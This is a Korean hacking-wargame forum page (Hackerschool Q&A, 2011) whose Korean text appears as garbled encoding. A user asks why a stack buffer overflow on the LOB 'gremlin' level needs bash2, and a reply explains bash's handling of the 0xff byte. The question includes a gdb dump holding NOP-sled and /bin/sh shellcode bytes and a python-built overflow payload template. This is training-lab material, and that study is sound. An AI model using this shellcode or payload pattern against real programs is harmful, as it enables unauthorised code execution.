·¹º§ ÇØÅ·

 2844, 1/143 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   incaro
   LOB Áú¹® µå·Á¿ä. (BASH2)

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=3211 [º¹»ç]


_____[gdb stack]_____________________________________________________________________
....
0xbffffa08:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa18:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa28:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa38:     0x90909090      0x90909090      0xcd58316a      0x89c38980
(gdb)
0xbffffa48:     0x58466ac1      0x685080cd      0x68732f2f      0x69622f68
0xbffffa58:     0x50e3896e      0x99e18953      0x80cd0bb0      0x90909090
0xbffffa68:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa78:     0x90909090      0x4000f9a8      0x00000002      0xbffffac4
...
(gdb) i reg ebp
ebp            0xbffffa78       -1073743240
_______________________________________________________________________________________
Áú¹® 1) ./gremlin $(python -c 'print "[NOP]"*200 + "[SCHELLCODE]" + "[NOP]*24 + "[RET]"
¿Í °°ÀÌ 260 + [RET] ÁÖ¼Ò·Î ºÐ¸í µ¤¾ú½À´Ï´Ù.
F.T.Z¿¡¼­ Àß µ¤ÇôÁ³´ø RETÁÖ¼Ò°¡ ¿Ö LOB¿¡¼­ 0X4000F9A8·Î ¾ÕºñÆ®°¡ ¾Èµ¤Çô Áö´ÂÁö ¸ð¸£°Ú³×¿ä.
- ±ÛÀ» ã¾Æº¸°í "export LANG=C"µµ Çغ¸¾ÒÁö¸¸ ¼Ò¿ëÀÌ ¾ø½À´Ï´Ù.

Áú¹® 2) ÀÚ²Ù Segmentation fault °¡ ³ª±æ·¡ ã¾Æº¸´Ï "bash2"¸¦ ¾²¶ó´õ±º¿ä.
ºÐ¸í bash2¸¦ ¾²¸é µË´Ï´Ù. ±Ùµ¥ ±× ÀÌÀ¯¿¡ ´ëÇÏ¿© ¸ð¸£°Ú³×¿ä
À§¿¡¼­ ó·³ ¶È°°ÀÌ gdb¿¡¼­ retÁÖ¼Ò°¡ ¾Èµ¤Çô º¸ÀÌ°í.... ´Þ¶óÁøÁ¡À» ¸ð¸£°Ú´Âµ¥... F.T.Z¿¡¼­ bash2¸¦ ¾È½áµµ À߉ç´ø°ÍÀÌ ¿Ö.... "bash2"¸¦ ½á¾ß ±úÁö´ÂÁö ÀÌÀ¯¸¦ ¾Ë°í½Í½À´Ï´Ù.
  Hit : 3651     Date : 2011/05/23 04:43


    
W.H. bash2¸¦ ¾²°í °ø°ÝÇغ¸¸é ¾Ë°ÚÁö¸¸ 0xff ÀÌÈÄ °ªÀÌ ¸ðµÎ Á¦´ë·Î µé¾î°¡´Â °É º¼ ¼ö ÀÕ½À´Ï´Ù.

¹Ý¸é bash¿¡¼­´Â 0xff ÀÌÈÄÀÇ ¸ðµç °ªÀÌ ½Î±×¸® ¹«½Ã°¡ µÇÁÒ.

ÀÌ°É·Î ºÃÀ»¶§ bash¿¡¼­´Â 0xff¸¦ 0x00(NULL) °ªÀ¸·Î ÀνÄÇÏ´Â °Í °°Áö¸¸ Á¤È®ÇÑÁö´Â ¸ð¸£°Ù½À´Ï´Ù.

ÇÏ¿©°£ bash2´Â 0xff °ªÀ» Á¦´ë·Î ÀνÄÇÏ¸ç ±× µÚÀÇ °ªÀ» ¹«½ÃÇÏÁö ¾Ê°í Á¦´ë·Î ³Ö¾îÁֱ⠶§¹®¿¡ bash2¸¦ »ç¿ëÇÏ´Â °Ì´Ï´Ù.

¹ºÂ÷ÀÌ ÀÖ´ÂÁö Á÷Á¢ º¸·Á¸é dumpcode ÀÌ¿ëÇØ º¸¼¼¿ä.		 2011/05/23  
2844   hack the box vpn ¼³Ä¡°¡ ¾È µË´Ï´Ù[2]     jyk5350
 07/16 1845
2843   ¿ö°ÔÀÓ¿¡¼­ ½ÇÁ¦ ÇÁ·ÎÁ§Æ®±îÁö À̾îÁö´Â °úÁ¤¿¡ °ü·ÃµÈ Áú¹®[2]     junhee329
 04/28 1579
2842   ftz Á¢¼Ó °ü·Ã[1]     pk2861
 04/01 1956
2841   level8ÀÇ ÈùÆ®ÆÄÀÏ ÈѼÕ[2]     MunHue
 06/05 2184
2840   ·¹º§1ÀÇ /bin/bash ¸í·É¾î....     MunHue
 05/15 2337
2839   ftz level4¿¡¼­ finger¸í·É¾î     krimson701
 04/20 2452
2838   /bin/bash¿¡ °üÇؼ­[3]     MunHue
 04/19 2535
2837   FC10 3¹ø ¹®Á¦ Áú¹®ÀÔ´Ï´Ù.[2]     tjdalstjr938
 04/02 2557
2836   ftzÀÌ ¾ÈµÇ¿ä¤Ð¤Ð¤Ð¤Ð¤Ð[1]     ersd145
 04/13 3213
2835   fedora core4 cruel Áú¹®[4]     vngkv123
 03/29 2660
2834   Fedora core4...[3]     vngkv123
 03/28 2669
2833   lob evil_wizard...[2]     vngkv123
 03/27 2324
2832   lob gremlin....[1]     vngkv123
 03/22 3700
2831   ftz level11 Áú¹®[1]     vngkv123
 03/19 2385
2830   pwnable.kr passcode¹®Á¦ Áú¹®...[3]     vngkv123
 03/14 2395
2829   ¿ö°ÔÀÓ Á¢ÇÒ ¼ö ÀÖ´Â »çÀÌÆ® ¾Ë·ÁÁÖ¼¼¿ä.[2]     ¿À¼Ò¸®
 02/23 3939
2828   ¿ö°ÔÀÓ ±â¹Ý Áö½Ä¿¡ °üÇÑ Áú¹®[1]     salangi11
 02/22 2284
2827   ftz Ç®±âÀ§ÇØ ÇÊ¿äÇÑ Áö½ÄÀÌ ±Ã±ÝÇÕ´Ï´Ù.[1]     read1516
 01/13 2696
2826   Lob[1]     km1434
 12/20 2477
2825   FTZ level4 ½© ¶ç¿ì´Â ¹®Á¦      kimstz0
 10/09 2909
1 [2][3][4][5][6][7][8][9][10]..[143]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org